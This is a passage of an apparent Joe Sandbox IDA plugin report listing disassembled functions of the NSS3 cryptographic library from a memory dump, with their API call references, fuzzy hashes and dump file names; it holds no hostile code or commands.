Part of subcall function 6C573E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C573EC2
Part of subcall function 6C573E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C573ED6
Part of subcall function 6C573E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C573EEE
Part of subcall function 6C573E60: PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C573F02
Part of subcall function 6C573E60: PL_FreeArenaPool.NSS3 ref: 6C573F14
Part of subcall function 6C573E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C573F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C59BE52

Part of subcall function 6C572E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C572CDA,?,00000000), ref: 6C572E1E
Part of subcall function 6C572E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C572E33
Part of subcall function 6C572E00: TlsGetValue.KERNEL32 ref: 6C572E4E
Part of subcall function 6C572E00: EnterCriticalSection.KERNEL32(?), ref: 6C572E5E
Part of subcall function 6C572E00: PL_HashTableLookup.NSS3(?), ref: 6C572E71
Part of subcall function 6C572E00: PL_HashTableRemove.NSS3(?), ref: 6C572E84
Part of subcall function 6C572E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C572E96
Part of subcall function 6C572E00: PR_Unlock.NSS3 ref: 6C572EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59BE61

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: 7726eb00bd5e2cf5a6200c9f5c61e179c2487ef941eb7ea40f6e004479d5d4ef
Instruction ID: f51702db38a8d4c545ce9837edc70fb18d9efaa9762f457c9a3222543bd3e7d9
Opcode Fuzzy Hash: 7726eb00bd5e2cf5a6200c9f5c61e179c2487ef941eb7ea40f6e004479d5d4ef
Instruction Fuzzy Hash: 3041B1B5A00250EFD720DF28DC81B6A77E8EF85718F1045A8E90997751E731ED14CBA2

Function 6C5BAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C5BAB3E,?,?,?), ref: 6C5BAC35

Part of subcall function 6C59CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C59CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C5BAB3E,?,?,?), ref: 6C5BAC55

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C5BAB3E,?,?), ref: 6C5BAC70

Part of subcall function 6C59E300: TlsGetValue.KERNEL32 ref: 6C59E33C
Part of subcall function 6C59E300: EnterCriticalSection.KERNEL32(?), ref: 6C59E350
Part of subcall function 6C59E300: PR_Unlock.NSS3(?), ref: 6C59E5BC
Part of subcall function 6C59E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C59E5CA
Part of subcall function 6C59E300: TlsGetValue.KERNEL32 ref: 6C59E5F2
Part of subcall function 6C59E300: EnterCriticalSection.KERNEL32(?), ref: 6C59E606
Part of subcall function 6C59E300: PORT_Alloc_Util.NSS3(?), ref: 6C59E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C5BAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5BAB3E), ref: 6C5BACD7
PORT_Alloc_Util.NSS3(?), ref: 6C5BAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C5BAD2B

Part of subcall function 6C59F360: TlsGetValue.KERNEL32(00000000,?,6C5BA904,?), ref: 6C59F38B
Part of subcall function 6C59F360: EnterCriticalSection.KERNEL32(?,?,?,6C5BA904,?), ref: 6C59F3A0
Part of subcall function 6C59F360: PR_Unlock.NSS3(?,?,?,?,6C5BA904,?), ref: 6C59F3D3

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: a535ade0d955f5cc136462abe9e74b498e1526e44d6df75d111e4ce8acc30b99
Instruction ID: 10be69654268c711ba054176eecf3d969c47ffeaedf6fea9ff31040b91b3decb
Opcode Fuzzy Hash: a535ade0d955f5cc136462abe9e74b498e1526e44d6df75d111e4ce8acc30b99
Instruction Fuzzy Hash: 983129B1E006059FEB00DF69CC519AF7B76AFD4328B198128F815AB740FB31ED1587A1

Function 6C598C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C598C7C

Part of subcall function 6C639DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C680A27), ref: 6C639DC6
Part of subcall function 6C639DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C680A27), ref: 6C639DD1

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C598CB0
TlsGetValue.KERNEL32 ref: 6C598CD1
EnterCriticalSection.KERNEL32(?), ref: 6C598CE5
PR_Unlock.NSS3(?), ref: 6C598D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C598D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C598D93

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockValuestrlen
String ID:
API String ID: 2830306428-0
Opcode ID: 34c977e23bf501c1c6673dc666c6eaab306ed4e401a4752edfaa54bc043e2cfe
Instruction ID: 3565ac8c08a8a1420454184ddec9ec4664955e86c22fde727e79568860f4dea0
Opcode Fuzzy Hash: 34c977e23bf501c1c6673dc666c6eaab306ed4e401a4752edfaa54bc043e2cfe
Instruction Fuzzy Hash: 2B314671A01701AFEB009F69DC407AAB7B0BF55318F24017AEA1A67B60D771A924C7D6

Function 6C5D9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C5D9C5B), ref: 6C5D9D82

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C5D9C5B), ref: 6C5D9DA9

Part of subcall function 6C5D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C57895A,00000000,?,00000000,?,00000000,?,00000000,?,6C56F599,?,00000000), ref: 6C5D136A
Part of subcall function 6C5D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C57895A,00000000,?,00000000,?,00000000,?,00000000,?,6C56F599,?,00000000), ref: 6C5D137E
Part of subcall function 6C5D1340: PL_ArenaGrow.NSS3(?,6C56F599,?,00000000,?,6C57895A,00000000,?,00000000,?,00000000,?,00000000,?,6C56F599,?), ref: 6C5D13CF
Part of subcall function 6C5D1340: PR_Unlock.NSS3(?,?,6C57895A,00000000,?,00000000,?,00000000,?,00000000,?,6C56F599,?,00000000), ref: 6C5D145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C5D9C5B), ref: 6C5D9DCE

Part of subcall function 6C5D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C57895A,00000000,?,00000000,?,00000000,?,00000000,?,6C56F599,?,00000000), ref: 6C5D13F0
Part of subcall function 6C5D1340: PL_ArenaGrow.NSS3(?,6C56F599,?,?,?,00000000,00000000,?,6C57895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C5D1445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C5D9C5B), ref: 6C5D9DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C5D9C5B), ref: 6C5D9DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C5D9C5B), ref: 6C5D9E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C5D9C5B), ref: 6C5D9E91

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

Part of subcall function 6C5D1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C5CFAAB,00000000), ref: 6C5D157E
Part of subcall function 6C5D1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C5CFAAB,00000000), ref: 6C5D1592
Part of subcall function 6C5D1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C5D1600
Part of subcall function 6C5D1560: PL_ArenaRelease.NSS3(?,?), ref: 6C5D1620
Part of subcall function 6C5D1560: PR_Unlock.NSS3(?), ref: 6C5D1639

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 40cfbe2b6cff8471945a95e2c49aa1ebd8bd9fabef7e46637d9d4c51db9147fc
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 99416DB4601606AFE740DF59DC50B92BBA1FF85358F158128D8188BFA1EB72F834CB94

Function 6C59DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C59DDEC

Part of subcall function 6C5D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D08B4

PK11_DigestBegin.NSS3(00000000), ref: 6C59DE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C59DE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6C59DE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C59DEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C59DEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C59DECC

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: 4afae685e8348c5fe107f9cb173c53196fb0e73164b2708b9fc18c3400e473d1
Instruction ID: 10463b98cd448022772c210c5223163575748da50c54a8d9ba3c1642cce71003
Opcode Fuzzy Hash: 4afae685e8348c5fe107f9cb173c53196fb0e73164b2708b9fc18c3400e473d1
Instruction Fuzzy Hash: 1431F8B2900254ABDB00AF79AC41BBB76B8DF95708F0501B5EC09A7701FB31DD18C6E2

Function 6C577E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C577E48

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C577E5B

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C577E7B

Part of subcall function 6C5CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5C8D2D,?,00000000,?), ref: 6C5CFB85
Part of subcall function 6C5CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5CFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C69925C,?), ref: 6C577E92

Part of subcall function 6C5CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A18D0,?), ref: 6C5CB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C577EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C577ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C577EFA

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: c11fc88aae3c415a51ffaae0dd81a9b64cc108eba210b7528a81dbb78e1c8819
Instruction ID: d312c1b96eb7858d7faf4c7c7a152b00d1794902777e7e5cb98fde96eef334d7
Opcode Fuzzy Hash: c11fc88aae3c415a51ffaae0dd81a9b64cc108eba210b7528a81dbb78e1c8819
Instruction Fuzzy Hash: FE3192B2A003119BEB219A79AD40B6B77A8EF44298F164925DC15EBB01E730FC44CBB1

Function 6C5CDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C5CD9E4,00000000), ref: 6C5CDC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C5CD9E4,00000000), ref: 6C5CDC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C5CD9E4,00000000), ref: 6C5CDC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5CDC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5CDCAD

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: efa1f4086b98269971be1d812b2d469cac800d7a38265bebff8a72feda92bc2a
Instruction ID: ed0c545a18bbb1dc50a8f3168031b5cbe369d06fbfc6c64299b9b488c95b6db4
Opcode Fuzzy Hash: efa1f4086b98269971be1d812b2d469cac800d7a38265bebff8a72feda92bc2a
Instruction Fuzzy Hash: 5A3138B5A402009FE750CF9DDC84A96B7F8AB65358F14842DE948CBB01E772E954CBA2

Function 6C592E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C58E728,?,00000038,?,?,00000000), ref: 6C592E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C592E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C592E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C592E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C592E9E
PR_Unlock.NSS3(?), ref: 6C592EAB
PR_Unlock.NSS3(?), ref: 6C592F0D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 0e372a105bd3d9d616f25716639b5c3b676760463872b7145be479c4b0b839dc
Instruction ID: 6bb3b938e1c5136e7675ceb9678e8d8ae11e2609588f31be590bf6dfb9107085
Opcode Fuzzy Hash: 0e372a105bd3d9d616f25716639b5c3b676760463872b7145be479c4b0b839dc
Instruction Fuzzy Hash: 92310579A00145ABEB01AF29DC8587AB778FF56258F0485B4EC0987B21EB31ED64C7E1

Function 6C5B1EA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&[l,6C596295,?,00000000,?,00000001,S&[l,?), ref: 6C5B1ECB

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

TlsGetValue.KERNEL32(?,00000001,?,S&[l,6C596295,?,00000000,?,00000001,S&[l,?), ref: 6C5B1EF1
EnterCriticalSection.KERNEL32(?), ref: 6C5B1F01
PR_SetError.NSS3(00000000,00000000), ref: 6C5B1F39

Part of subcall function 6C5BFE20: TlsGetValue.KERNEL32(6C595ADC,?,00000000,00000001,?,?,00000000,?,6C58BA55,?,?), ref: 6C5BFE4B
Part of subcall function 6C5BFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5BFE5F

PR_Unlock.NSS3(?), ref: 6C5B1F67

Strings

S&[l, xrefs: 6C5B1EA0

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID: S&[l
API String ID: 704537481-3648515310
Opcode ID: 14146b69257792656008fd1edb6968089e6c54e24d15148d41142f035e89924b
Instruction ID: b0e68e4ddc1e3bd62f6cae74be6fac118bd5ac787f28778c9545c12927367c8a
Opcode Fuzzy Hash: 14146b69257792656008fd1edb6968089e6c54e24d15148d41142f035e89924b
Instruction Fuzzy Hash: 0D21E475A04204ABEB40DF2ADC95A9B3B69AF81368F144564FD08A7B11EB30ED54C7E1

Function 6C5DCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C5DCD93,?), ref: 6C5DCEEE

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C5DCD93,?), ref: 6C5DCEFC

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C5DCD93,?), ref: 6C5DCF0B

Part of subcall function 6C5D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C5DCD93,?), ref: 6C5DCF1D

Part of subcall function 6C5CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5C8D2D,?,00000000,?), ref: 6C5CFB85
Part of subcall function 6C5CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5CFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C5DCD93,?), ref: 6C5DCF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C5DCD93,?), ref: 6C5DCF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C5DCD93,?,?,?,?,?,?,?,?,?,?,?,6C5DCD93,?), ref: 6C5DCF78

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
